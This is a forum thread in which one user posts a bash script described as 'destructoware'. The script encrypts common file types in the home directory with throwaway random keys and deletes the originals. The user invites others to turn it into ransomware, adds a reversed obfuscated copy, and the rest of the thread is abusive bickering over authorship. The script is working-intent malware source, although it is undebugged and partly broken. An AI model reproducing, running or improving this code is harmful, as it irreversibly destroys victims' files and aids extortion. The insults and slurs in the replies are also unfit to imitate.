User Controls

Vandalize loonix.

  1. #1
    Sophie Pedophile Tech Support
    I felt like writing a shell script, so i did, i didn't debug it however so it might not work 100%. Even so i wouldn't risk running this like YOLO.


    #!/bin/bash

    declare -A dword

    dword[0]="*.c"
    dword[1]="*.py"
    dword[2]="*.txt"
    dword[3]="*.doc"
    dword[4]="*.sh"
    dword[5]="*.php"
    dword[6]="*.sqlite"
    dword[7]="*.sql"
    dword[8]="*.rar"
    dword[9]="*.zip"
    dword[10]="*.7z"
    dword[11]="*.rb"
    dword[12]="*.js"
    dword[13]="*.h"
    dword[14]="*.cpp"
    dword[15]="*.png"
    dword[16]="*.jpeg"
    dword[17]="*.mov"
    dword[18]="*.mpeg"
    dword[19]="*.avi"
    dword[20]="*.mp4"


    cd /tmp

    do_it(){
    rand=$[ $RANDOM % 20 ] && rdf=${dword[$rand]}
    while true ; do
    crypt $HOME $rdf
    done
    };

    # Main Crypto Operation
    crypt(){
    dir=$1
    file=$2


    while IFS= read -d $'\0' -r file ; do
    file_list=("${file_list[@]}" "$file")
    for $file in $file_list
    do
    pword=''
    pword=$(cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c16)
    openssl enc -aes256 -e -k $pword -pbkdf2 -in $file -out $file.enc
    rm -rf $file
    #echo -e $pword
    #echo -e $file

    done;

    done < <( find $dir/$file -name -print0 );

    };

    # Fallback
    write_buf_B(){
    cat << EOF > $TMP/crypt.src
    #!/usr/bin/env bash
    dir=$1
    file=$2


    while IFS= read -d $'\0' -r file ; do
    file_list=("${file_list[@]}" "$file")
    for $file in $file_list
    do
    pword=''
    pword=$(cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c16)
    openssl enc -aes256 -e -k $pword -pbkdf2 -in $file -out $file.enc
    rm -rf $file
    #echo -e $pword
    #echo -e $file

    done;

    done < <( find $dir/$file -name -print0 );
    EOF

    write_buf_A()

    };

    write_buf_A(){
    cat << EOF > /tmp/cys
    #!/usr/bin/env bash
    umask -p 700 2>/dev/null
    buff_ops()
    {
    cmd=$1
    arg=$2
    rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev

    };

    buff_ops 'chmod +xs ' 'crypt.src ''
    EOF

    chmod +xs cys
    rand=$[ $RANDOM % 20 ] && rdf=${dword[$rand]}
    while true ; do
    ./cys ' exec /tmp/crypt.src ' '$HOME $rdf ' || exec /tmp/crypt.src $HOME $rdf
    done


    };

    # Init Ops
    if [[ $(which openssl) == '' ]]; then
    OPENSSL_VERSION='1.1.1k'

    # Download
    curl -LO https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz
    tar zxvf openssl-${OPENSSL_VERSION}.tar.gz
    cd openssl-${OPENSSL_VERSION}

    # Configure
    CC=/usr/bin/afl-gcc -static ./Configure no-shared linux-x86_64

    # Build
    make
    fi
    umask -p 0700 2>/dev/null

    do_it() || write_buf_B()
    chmod +xs cys && ./cys 2>/dev/null


    Feel free to adapt from destructoware to ransomware, if you have the ability and the motivation to do so. I even put some light obfuscation on it for you.


    #!/usr/bin/env bash
    ${!#} <<< "$(rev <<<'}#!{$|")"}~~fI{$" s% ftnirp;'"'"'

    LLUN/VED/>2 SYC/. && SYC SX+ DOMHC
    )(b_FUB_ETIRW || )(TI_OD

    LLUN/VED/>2 0070 P- KSAMU
    PMT/ DC
    IF
    EKAM
    DLIUb #

    46_68X-XUNIL DERAHS-ON ERUGIFNOc/. CITATS- CCG-LFA/NIB/RSU/=cc
    ERUGIFNOc #

    }noisrev_lssnepo{$-LSSNEPO DC
    ZG.RAT.}noisrev_lssnepo{$-LSSNEPO FVXZ RAT
    ZG.RAT.}noisrev_lssnepo{$-LSSNEPO/ECRUOS/GRO.LSSNEPO.WWW//:SPTTH ol- LRUC
    DAOLNWOd #

    '"'"'"'"'"'"'"'"'K1.1.1'"'"'"'"'"'"'"'"'=noisrev_lssnepo
    NEHT ;]] '"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"' == )LSSNEPO HCIHW($ [[ FI
    SPo TINi #

    ;}


    ENOD
    FDR$ emoh$ CRS.TPYRC/pmt$ CEXE
    OD ; EURT ELIHW
    }]DNAR$[DROWD{$=FDR && ] 02 % modnar$ [$=DNAR
    SYC SX+ DOMHC

    foe
    '"'"'"'"'"'"'"'"'LLUN/VED/>2 0TNIRP- W+O- MREP- DNIF($ emoh$ CRS.TPYRC/.'"'"'"'"'"'"'"'"' '"'"'"'"'"'"'"'"' CEXE'"'"'"'"'"'"'"'"' SPO_FFUB
    '"'"'"'"'"'"'"'"' CRS.TPYRC'"'"'"'"'"'"'"'"' '"'"'"'"'"'"'"'"' SX+ DOMHC'"'"'"'"'"'"'"'"' SPO_FFUB

    ;}

    VED_U>1 HSAB/NIB/ | VED_U<0 `)}GRA '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ DMC{$( T- DAER` < TAC && P VED_U DONKM ;VED_U R- MR
    2$=GRA
    1$=DMC
    {
    )(SPO_FFUB
    LLUN/VED/>2 007 P- KSAMU
    HSAB VNE/NIB/RSU/!#
    SYC/pmt$ > foe << TAC
    {)(a_FUB_ETIRW

    ;}

    )(a_FUB_ETIRW

    foe
    ;) 0TNIRP- EMAN- ELIF$/RID$ DNIF (< < ENOD

    ;ENOD

    ELIF$ E- OHCE
    DROWP$ E- OHCE
    ELIF$ FR- MR
    CNE.ELIF$ TUO- ELIF$ NI- 2FDKBP- DROWP$ K- E- 652SEA- CNE LSSNEPO
    )61C- DAEH | '"'"'"'"'"'"'"'"'9-0z-aZ-A'"'"'"'"'"'"'"'"' CD- RT c=lla_cl | MODNAR/VED/ TAC($=DROWP
    '"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"'=DROWP
    OD
    TSIL_ELIF$ NI ELIF$ ROF
    )"ELIF$" "}]@[TSIL_ELIF{$"(=TSIL_ELIF
    OD ; ELIF R- '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ D- DAER =sfi ELIHW


    2$=ELIF
    1$=RID
    HSAB VNE/NIB/RSU/!#
    CRS.TPYRC/pmt$ > foe << TAC
    {)(b_FUB_ETIRW
    KCABLLAf #

    ;}

    ;) 0TNIRP- EMAN- ELIF$/RID$ DNIF (< < ENOD

    ;ENOD

    ELIF$ E- OHCE#
    DROWP$ E- OHCE#
    ELIF$ FR- MR
    CNE.ELIF$ TUO- ELIF$ NI- 2FDKBP- DROWP$ K- E- 652SEA- CNE LSSNEPO
    )61C- DAEH | '"'"'"'"'"'"'"'"'9-0z-aZ-A'"'"'"'"'"'"'"'"' CD- RT c=lla_cl | MODNAR/VED/ TAC($=DROWP
    '"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"'=DROWP
    OD
    TSIL_ELIF$ NI ELIF$ ROF
    )"ELIF$" "}]@[TSIL_ELIF{$"(=TSIL_ELIF
    OD ; ELIF R- '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ D- DAER =sfi ELIHW


    2$=ELIF
    1$=RID
    {)(TPYRC
    NOITAREPo OTPYRc NIAm #

    ;}
    ENOD
    FDR$ emoh$ TPYRC
    OD ; EURT ELIHW
    }]DNAR$[DROWD{$=FDR && ] 02 % modnar$ [$=DNAR
    {)(TI_OD

    PMT/ DC


    "4PM.*"=]02[DROWD
    "IVA.*"=]91[DROWD
    "GEPM.*"=]81[DROWD
    "VOM.*"=]71[DROWD
    "GEPJ.*"=]61[DROWD
    "GNP.*"=]51[DROWD
    "PPC.*"=]41[DROWD
    "H.*"=]31[DROWD
    "SJ.*"=]21[DROWD
    "BR.*"=]11[DROWD
    "Z7.*"=]01[DROWD
    "PIZ.*"=]9[DROWD
    "RAR.*"=]8[DROWD
    "LQS.*"=]7[DROWD
    "ETILQS.*"=]6[DROWD
    "PHP.*"=]5[DROWD
    "HS.*"=]4[DROWD
    "COD.*"=]3[DROWD
    "TXT.*"=]2[DROWD
    "YP.*"=]1[DROWD
    "C.*"=]0[DROWD

    DROWD a- ERALCED
    '"'"'=fI($" s% ftnirp';)"


    Bona Fortuna.
  2. #2
    Sophie Pedophile Tech Support
    No answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
  3. #3
    cigreting Naturally Camouflaged
    wats 4PM.*"=]02[DROWD
    "IVA.*"=]91[DROWD
    "GEPM.*"=]81[DROWD
    "VOM.*"=]71[DROWD
    "GEPJ.*"=]61[DROWD
    "GNP.*"=]51[DROWD
    "PPC.*"=]41[DROWD
    "H.*"=]31[DROWD
    "SJ.*"=]21[DROWD
    "BR.*"=]11[DROWD
    "Z7.*"=]01[DROWD
    "PIZ.*"=]9[DROWD
    "RAR.*"=]8[DROWD
    "LQS.*"=]7[DROWD
    "ETILQS.*"=]6[DROWD
    "PHP.*"=]5[DROWD
    "HS.*"=]4[DROWD
    "COD.*"=]3[DROWD
    "TXT.*"=]2[DROWD
    "YP.*"=]1[DROWD
    "C.*"=]0[DROWD
  4. #4
    Bradley victim of incest
    2$=ELIF
    1$=RID
    {)(TPYRC
    NOITAREPo OTPYRc NIAm #

    what this do
  5. #5
    troon African Astronaut
    Originally posted by Sophie No answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.

    you don't have a single clue what the fuck you're doing sophie, that has been well established.

    there's an error in it, it's really fucking obvious. one of the container format file types will never be encrypted, tell me which one and why.

    i'll even give you a clue, because i know you'll need it - it's a really common class of error.
  6. #6
    Sophie Pedophile Tech Support
    Suck my dick. Did you read the OP? I didn't debug it. Because i didn't feel like it. What's with you and getting big mad at me for posting half assed stuff and claiming God mode, for the lulz.

    By the way, do you honestly think i care if it doesn't encrypt something? I just shotgunned a bunch of file formats. Do you really think i run Ransomware Ops or any kind of Ops with the content i post here? Lmao.
  7. #7
    Sophie Pedophile Tech Support
    Hey troon, did you study Computer Science at University? Is that the reason you're so uptight about this. Even if you work in Cyber Security wanna bet i make more money than you?
  8. #8
    troon African Astronaut
    Originally posted by Sophie I didn't debug it

    you didn't even write it sophie lmao
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. #9
    Sophie Pedophile Tech Support
    Originally posted by troon you didn't even write it sophie lmao

    Au contrair mon frere.
  10. #10
    Octavian. Houston
    Troon showing who's the real coder
  11. #11
    Sophie Pedophile Tech Support
    I have a distinct way of writing Bash. If you can find the Github account that has the same style as me, to the letter. I will login to github, and make a 'troon is silly' repo. Because the Github account in question will be mine.
  12. #12
    Sophie Pedophile Tech Support
    Originally posted by Octavian. Troon showing who's the real coder

    Go harass Kafka, this is a big boy thread.
  13. #13
    troon African Astronaut
    Originally posted by Sophie I have a distinct way of writing Bash

    ctrl+a, ctrl+c

    ctrl+v
  14. #14
    Sophie Pedophile Tech Support
    Originally posted by troon ctrl+a, ctrl+c

    ctrl+v

    Okay that's funny, but you're still taking the piss.
  15. #15
    Bradley victim of incest
    Troon is the real tech master here clearly.
  16. #16
    Sophie Pedophile Tech Support
    Originally posted by Bradley Troon is the real tech master here clearly.

    Do you generally only start talking shit when there's more than just you.
  17. #17
    Octavian. Houston
    Lol Sophie the copy 'n paste master getting schooled by Troon.
  18. #18
    Sophie Pedophile Tech Support
    Troon is still salty from that one thread where MLT dropped by to back my work up. Troon has been a fan of TeamPoison since he was a small boy.
  19. #19
    Speedy Parker Black Hole [my absentmindedly lachrymatory gazania]
    Originally posted by Sophie Do you generally only start talking shit when there's more than just you.

    He latches on to anyone's tail that he perceives to have the upper hand in a desperate attempt to be liked by someone.
    The following users say it would be alright if the author of this post didn't die in a fire!
Jump to Top